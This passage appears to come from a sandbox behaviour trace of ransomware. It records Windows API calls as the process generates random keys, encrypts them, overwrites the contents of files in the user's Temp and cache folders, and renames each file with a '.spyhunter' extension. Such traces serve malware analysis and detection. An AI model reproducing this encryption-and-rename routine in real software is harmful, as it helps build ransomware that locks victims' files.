(HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0139.381] ReadFile (in: hFile=0xec, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f274, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57f274*=0x43, lpOverlapped=0x0) returned 1 [0139.381] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffffbd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0139.381] WriteFile (in: hFile=0xec, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x57f274, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57f274*=0x43, lpOverlapped=0x0) returned 1 [0139.445] GetProcessHeap () returned 0x2c0000 [0139.446] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0139.446] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.446] WriteFile (in: hFile=0xec, lpBuffer=0x57f2b4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f274, lpOverlapped=0x0 | out: lpBuffer=0x57f2b4*, lpNumberOfBytesWritten=0x57f274*=0x4, lpOverlapped=0x0) returned 1 [0139.446] WriteFile (in: hFile=0xec, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f274, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x57f274*=0x30, lpOverlapped=0x0) returned 1 [0139.446] CloseHandle (hObject=0xec) returned 1 [0139.446] GetProcessHeap () returned 0x2c0000 [0139.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ff5a50 [0139.446] wnsprintfW (in: pszDest=0x2ff5a50, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\KETAJP6D\\desktop.ini.spyhunter") returned 120 [0139.446] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\KETAJP6D\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\ketajp6d\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\KETAJP6D\\desktop.ini.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\ketajp6d\\desktop.ini.spyhunter")) returned 1 [0139.450] GetProcessHeap () returned 0x2c0000 [0139.450] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff5a50 | out: hHeap=0x2c0000) returned 1 [0139.450] GetProcessHeap () returned 0x2c0000 [0139.450] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0139.450] GetProcessHeap () returned 0x2c0000 [0139.450] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc0178 | out: hHeap=0x2c0000) returned 1 [0139.450] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f2b8 | out: pbBuffer=0x57f2b8) returned 1 [0139.450] GetProcessHeap () returned 0x2c0000 [0139.450] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0139.451] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f2b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f2b0*=0x30) returned 1 [0139.451] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\l-H8Kz.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\l-h8kz.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0139.451] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\l-H8Kz.swf") returned 63 [0139.451] StrStrW (lpFirst="l-H8Kz.swf", lpSrch=".txt") returned 0x0 [0139.451] GetProcessHeap () returned 0x2c0000 [0139.451] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0139.451] ReadFile (in: hFile=0xec, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f274, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f274*=0x2800, lpOverlapped=0x0) returned 1 [0139.452] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0139.452] WriteFile (in: hFile=0xec, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f274, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f274*=0x2800, lpOverlapped=0x0) returned 1 [0139.452] GetProcessHeap () returned 0x2c0000 [0139.452] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0139.452] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.453] WriteFile (in: hFile=0xec, lpBuffer=0x57f2b4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f274, lpOverlapped=0x0 | out: lpBuffer=0x57f2b4*, lpNumberOfBytesWritten=0x57f274*=0x4, lpOverlapped=0x0) returned 1 [0139.453] WriteFile (in: hFile=0xec, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f274, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x57f274*=0x30, lpOverlapped=0x0) returned 1 [0139.453] CloseHandle (hObject=0xec) returned 1 [0139.453] GetProcessHeap () returned 0x2c0000 [0139.453] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ff5a50 [0139.453] wnsprintfW (in: pszDest=0x2ff5a50, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\l-H8Kz.swf.spyhunter") returned 73 [0139.453] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\l-H8Kz.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\l-h8kz.swf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\l-H8Kz.swf.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\l-h8kz.swf.spyhunter")) returned 1 [0139.454] GetProcessHeap () returned 0x2c0000 [0139.454] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff5a50 | out: hHeap=0x2c0000) returned 1 [0139.454] GetProcessHeap () returned 0x2c0000 [0139.455] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0139.455] GetProcessHeap () returned 0x2c0000 [0139.455] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c85550 | out: hHeap=0x2c0000) returned 1 [0139.455] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f2b0 | out: pbBuffer=0x57f2b0) returned 1 [0139.455] GetProcessHeap () returned 0x2c0000 [0139.455] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0139.455] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f2a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f2a8*=0x30) returned 1 [0139.455] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\JTfBmDI.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\jtfbmdi.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0139.455] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\JTfBmDI.docx") returned 65 [0139.455] StrStrW (lpFirst="JTfBmDI.docx", lpSrch=".txt") returned 0x0 [0139.455] GetProcessHeap () returned 0x2c0000 [0139.455] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0139.455] ReadFile (in: hFile=0xec, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f26c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f26c*=0x2800, lpOverlapped=0x0) returned 1 [0139.456] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0139.456] WriteFile (in: hFile=0xec, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f26c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f26c*=0x2800, lpOverlapped=0x0) returned 1 [0139.456] GetProcessHeap () returned 0x2c0000 [0139.456] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0139.457] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.457] WriteFile (in: hFile=0xec, lpBuffer=0x57f2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f26c, lpOverlapped=0x0 | out: lpBuffer=0x57f2ac*, lpNumberOfBytesWritten=0x57f26c*=0x4, lpOverlapped=0x0) returned 1 [0139.457] WriteFile (in: hFile=0xec, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f26c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x57f26c*=0x30, lpOverlapped=0x0) returned 1 [0139.457] CloseHandle (hObject=0xec) returned 1 [0139.457] GetProcessHeap () returned 0x2c0000 [0139.457] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ff5a50 [0139.457] wnsprintfW (in: pszDest=0x2ff5a50, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\JTfBmDI.docx.spyhunter") returned 75 [0139.457] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\JTfBmDI.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\jtfbmdi.docx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\JTfBmDI.docx.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\jtfbmdi.docx.spyhunter")) returned 1 [0139.458] GetProcessHeap () returned 0x2c0000 [0139.458] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff5a50 | out: hHeap=0x2c0000) returned 1 [0139.458] GetProcessHeap () returned 0x2c0000 [0139.458] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0139.458] GetProcessHeap () returned 0x2c0000 [0139.458] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e086e8 | out: hHeap=0x2c0000) returned 1 [0139.458] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f2b0 | out: pbBuffer=0x57f2b0) returned 1 [0139.458] GetProcessHeap () returned 0x2c0000 [0139.458] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0139.458] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f2a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f2a8*=0x30) returned 1 [0139.459] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\ixpQCTooSuafLxx.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\ixpqctoosuaflxx.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0139.459] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\ixpQCTooSuafLxx.mkv") returned 72 [0139.459] StrStrW (lpFirst="ixpQCTooSuafLxx.mkv", lpSrch=".txt") returned 0x0 [0139.459] GetProcessHeap () returned 0x2c0000 [0139.459] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0139.459] ReadFile (in: hFile=0xec, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f26c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f26c*=0x2800, lpOverlapped=0x0) returned 1 [0139.460] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0139.460] WriteFile (in: hFile=0xec, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f26c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f26c*=0x2800, lpOverlapped=0x0) returned 1 [0139.460] GetProcessHeap () returned 0x2c0000 [0139.460] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0139.460] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.460] WriteFile (in: hFile=0xec, lpBuffer=0x57f2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f26c, lpOverlapped=0x0 | out: lpBuffer=0x57f2ac*, lpNumberOfBytesWritten=0x57f26c*=0x4, lpOverlapped=0x0) returned 1 [0139.461] WriteFile (in: hFile=0xec, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f26c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x57f26c*=0x30, lpOverlapped=0x0) returned 1 [0139.461] CloseHandle (hObject=0xec) returned 1 [0139.461] GetProcessHeap () returned 0x2c0000 [0139.461] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ff5a50 [0139.461] wnsprintfW (in: pszDest=0x2ff5a50, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\ixpQCTooSuafLxx.mkv.spyhunter") returned 82 [0139.461] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\ixpQCTooSuafLxx.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\ixpqctoosuaflxx.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\ixpQCTooSuafLxx.mkv.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\ixpqctoosuaflxx.mkv.spyhunter")) returned 1 [0139.645] GetProcessHeap () returned 0x2c0000 [0139.645] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff5a50 | out: hHeap=0x2c0000) returned 1 [0139.648] GetProcessHeap () returned 0x2c0000 [0139.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0139.648] GetProcessHeap () returned 0x2c0000 [0139.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb4e78 | out: hHeap=0x2c0000) returned 1 [0139.657] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f298 | out: pbBuffer=0x57f298) returned 1 [0139.657] GetProcessHeap () returned 0x2c0000 [0139.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0139.657] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f290*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f290*=0x30) returned 1 [0139.657] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F90F18257CBB4D84216AC1E1F3BB2C76" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\f90f18257cbb4d84216ac1e1f3bb2c76"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0139.657] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F90F18257CBB4D84216AC1E1F3BB2C76") returned 119 [0139.657] StrStrW (lpFirst="F90F18257CBB4D84216AC1E1F3BB2C76", lpSrch=".txt") returned 0x0 [0139.658] GetProcessHeap () returned 0x2c0000 [0139.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0139.658] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f254, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57f254*=0xfc, lpOverlapped=0x0) returned 1 [0139.658] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffff04, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0139.659] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xfc, lpNumberOfBytesWritten=0x57f254, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57f254*=0xfc, lpOverlapped=0x0) returned 1 [0139.659] GetProcessHeap () returned 0x2c0000 [0139.659] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0139.659] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.659] WriteFile (in: hFile=0xec, lpBuffer=0x57f294*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f254, lpOverlapped=0x0 | out: lpBuffer=0x57f294*, lpNumberOfBytesWritten=0x57f254*=0x4, lpOverlapped=0x0) returned 1 [0139.659] WriteFile (in: hFile=0xec, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f254, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x57f254*=0x30, lpOverlapped=0x0) returned 1 [0139.659] CloseHandle (hObject=0xec) returned 1 [0139.659] GetProcessHeap () returned 0x2c0000 [0139.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ff5a50 [0139.659] wnsprintfW (in: pszDest=0x2ff5a50, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F90F18257CBB4D84216AC1E1F3BB2C76.spyhunter") returned 129 [0139.660] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F90F18257CBB4D84216AC1E1F3BB2C76" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\f90f18257cbb4d84216ac1e1f3bb2c76"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F90F18257CBB4D84216AC1E1F3BB2C76.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\f90f18257cbb4d84216ac1e1f3bb2c76.spyhunter")) returned 1 [0139.660] GetProcessHeap () returned 0x2c0000 [0139.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff5a50 | out: hHeap=0x2c0000) returned 1 [0139.660] GetProcessHeap () returned 0x2c0000 [0139.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0139.660] GetProcessHeap () returned 0x2c0000 [0139.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe83c8 | out: hHeap=0x2c0000) returned 1 [0139.661] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f290 | out: pbBuffer=0x57f290) returned 1 [0139.661] GetProcessHeap () returned 0x2c0000 [0139.661] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0139.661] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f288*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f288*=0x30) returned 1 [0139.661] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\f293aead5e84facfb686c4a620718928_c8424a0b24a72939b13720d0c000c9c1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0139.665] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1") returned 152 [0139.665] StrStrW (lpFirst="F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1", lpSrch=".txt") returned 0x0 [0139.665] GetProcessHeap () returned 0x2c0000 [0139.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0139.665] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f24c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57f24c*=0x1a0, lpOverlapped=0x0) returned 1 [0139.666] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xfffffe60, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0139.666] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x1a0, lpNumberOfBytesWritten=0x57f24c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57f24c*=0x1a0, lpOverlapped=0x0) returned 1 [0139.666] GetProcessHeap () returned 0x2c0000 [0139.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0139.666] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.666] WriteFile (in: hFile=0xec, lpBuffer=0x57f28c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f24c, lpOverlapped=0x0 | out: lpBuffer=0x57f28c*, lpNumberOfBytesWritten=0x57f24c*=0x4, lpOverlapped=0x0) returned 1 [0139.666] WriteFile (in: hFile=0xec, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f24c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x57f24c*=0x30, lpOverlapped=0x0) returned 1 [0139.666] CloseHandle (hObject=0xec) returned 1 [0139.666] GetProcessHeap () returned 0x2c0000 [0139.666] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ff5a50 [0139.667] wnsprintfW (in: pszDest=0x2ff5a50, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1.spyhunter") returned 162 [0139.667] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\f293aead5e84facfb686c4a620718928_c8424a0b24a72939b13720d0c000c9c1"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\f293aead5e84facfb686c4a620718928_c8424a0b24a72939b13720d0c000c9c1.spyhunter")) returned 1 [0139.667] GetProcessHeap () returned 0x2c0000 [0139.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff5a50 | out: hHeap=0x2c0000) returned 1 [0139.667] GetProcessHeap () returned 0x2c0000 [0139.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0139.668] GetProcessHeap () returned 0x2c0000 [0139.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fed5e0 | out: hHeap=0x2c0000) returned 1 [0139.668] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f290 | out: pbBuffer=0x57f290) returned 1 [0139.668] GetProcessHeap () returned 0x2c0000 [0139.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0139.668] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f288*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f288*=0x30) returned 1 [0139.668] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 